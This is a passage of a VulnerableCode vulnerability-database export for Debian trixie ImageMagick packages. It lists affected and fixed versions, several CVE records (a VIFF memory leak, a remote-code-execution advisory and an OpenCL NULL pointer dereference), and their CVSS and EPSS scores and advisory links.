vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-18853

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-g1e8-3nnr-gqff

url VCID-gmm9-wk5j-gfh4

vulnerability_id VCID-gmm9-wk5j-gfh4

summary ImageMagick: a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13134.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13134.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-13134

reference_id

reference_type

scores

value	0.00095
scoring_system	epss
scoring_elements	0.26218
published_at	2026-04-26T12:55:00Z

value	0.00095
scoring_system	epss
scoring_elements	0.26358
published_at	2026-04-16T12:55:00Z

value	0.00095
scoring_system	epss
scoring_elements	0.26331
published_at	2026-04-18T12:55:00Z

value	0.00095
scoring_system	epss
scoring_elements	0.26294
published_at	2026-04-21T12:55:00Z

value	0.00095
scoring_system	epss
scoring_elements	0.26225
published_at	2026-04-24T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26666
published_at	2026-04-07T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26784
published_at	2026-04-09T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26788
published_at	2026-04-11T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26744
published_at	2026-04-12T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26687
published_at	2026-04-13T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26796
published_at	2026-04-01T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26734
published_at	2026-04-08T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26839
published_at	2026-04-02T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.2688
published_at	2026-04-04T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-13134

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1726081
reference_id	1726081
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1726081

reference_url	https://access.redhat.com/errata/RHSA-2020:1180
reference_id	RHSA-2020:1180
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2020:1180

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-13134

risk_score 1.5

exploitability 0.5

weighted_severity 3.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gmm9-wk5j-gfh4

url VCID-h6hy-g7da-1yg4

vulnerability_id VCID-h6hy-g7da-1yg4

summary Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-34153.json

reference_id

reference_type

scores

value	7.8
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-34153.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2023-34153

reference_id

reference_type

scores

value	0.00703
scoring_system	epss
scoring_elements	0.72139
published_at	2026-04-26T12:55:00Z

value	0.00703
scoring_system	epss
scoring_elements	0.72015
published_at	2026-04-02T12:55:00Z

value	0.00703
scoring_system	epss
scoring_elements	0.7205
published_at	2026-04-08T12:55:00Z

value	0.00703
scoring_system	epss
scoring_elements	0.72062
published_at	2026-04-09T12:55:00Z

value	0.00703
scoring_system	epss
scoring_elements	0.72085
published_at	2026-04-11T12:55:00Z

value	0.00703
scoring_system	epss
scoring_elements	0.72069
published_at	2026-04-12T12:55:00Z

value	0.00703
scoring_system	epss
scoring_elements	0.72053
published_at	2026-04-13T12:55:00Z

value	0.00703
scoring_system	epss
scoring_elements	0.72095
published_at	2026-04-16T12:55:00Z

value	0.00703
scoring_system	epss
scoring_elements	0.72102
published_at	2026-04-18T12:55:00Z

value	0.00703
scoring_system	epss
scoring_elements	0.72087
published_at	2026-04-21T12:55:00Z

value	0.00703
scoring_system	epss
scoring_elements	0.7213
published_at	2026-04-24T12:55:00Z

value	0.00703
scoring_system	epss
scoring_elements	0.72035
published_at	2026-04-04T12:55:00Z

value	0.00703
scoring_system	epss
scoring_elements	0.72011
published_at	2026-04-07T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2023-34153

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://bugzilla.redhat.com/show_bug.cgi?id=2210660

reference_id

2210660

reference_type

scores

value	7.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-10T21:02:03Z/

url

https://bugzilla.redhat.com/show_bug.cgi?id=2210660

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3/

reference_id

4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3

reference_type

scores

value	7.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-10T21:02:03Z/

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3/

reference_url

https://github.com/ImageMagick/ImageMagick/issues/6338

reference_id

6338

reference_type

scores

value	7.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-10T21:02:03Z/

url

https://github.com/ImageMagick/ImageMagick/issues/6338

reference_url

https://access.redhat.com/security/cve/CVE-2023-34153

reference_id

CVE-2023-34153

reference_type

scores

value	7.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-10T21:02:03Z/

url

https://access.redhat.com/security/cve/CVE-2023-34153

reference_url	https://security.gentoo.org/glsa/202405-02
reference_id	GLSA-202405-02
reference_type
scores
url	https://security.gentoo.org/glsa/202405-02

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V2ZUHZXQ2C3JZYKPW4XHCMVVL467MA2V/

reference_id

V2ZUHZXQ2C3JZYKPW4XHCMVVL467MA2V

reference_type

scores

value	7.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-10T21:02:03Z/

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V2ZUHZXQ2C3JZYKPW4XHCMVVL467MA2V/

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2023-34153

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-h6hy-g7da-1yg4

url VCID-h8cp-df76-c3dz

vulnerability_id VCID-h8cp-df76-c3dz

summary ImageMagick: NULL pointer dereference in LogOpenCLBuildFailure function in MagickCore/opencl.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-18250.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-18250.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2017-18250

reference_id

reference_type

scores

value	0.00381
scoring_system	epss
scoring_elements	0.59412
published_at	2026-04-01T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59485
published_at	2026-04-02T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.5951
published_at	2026-04-04T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59478
published_at	2026-04-07T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59528
published_at	2026-04-08T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59541
published_at	2026-04-09T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.5956
published_at	2026-04-11T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59544
published_at	2026-04-12T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59525
published_at	2026-04-13T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59559
published_at	2026-04-16T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59566
published_at	2026-04-18T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59547
published_at	2026-04-21T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.5952
published_at	2026-04-24T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.5954
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2017-18250

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1561738
reference_id	1561738
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1561738

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

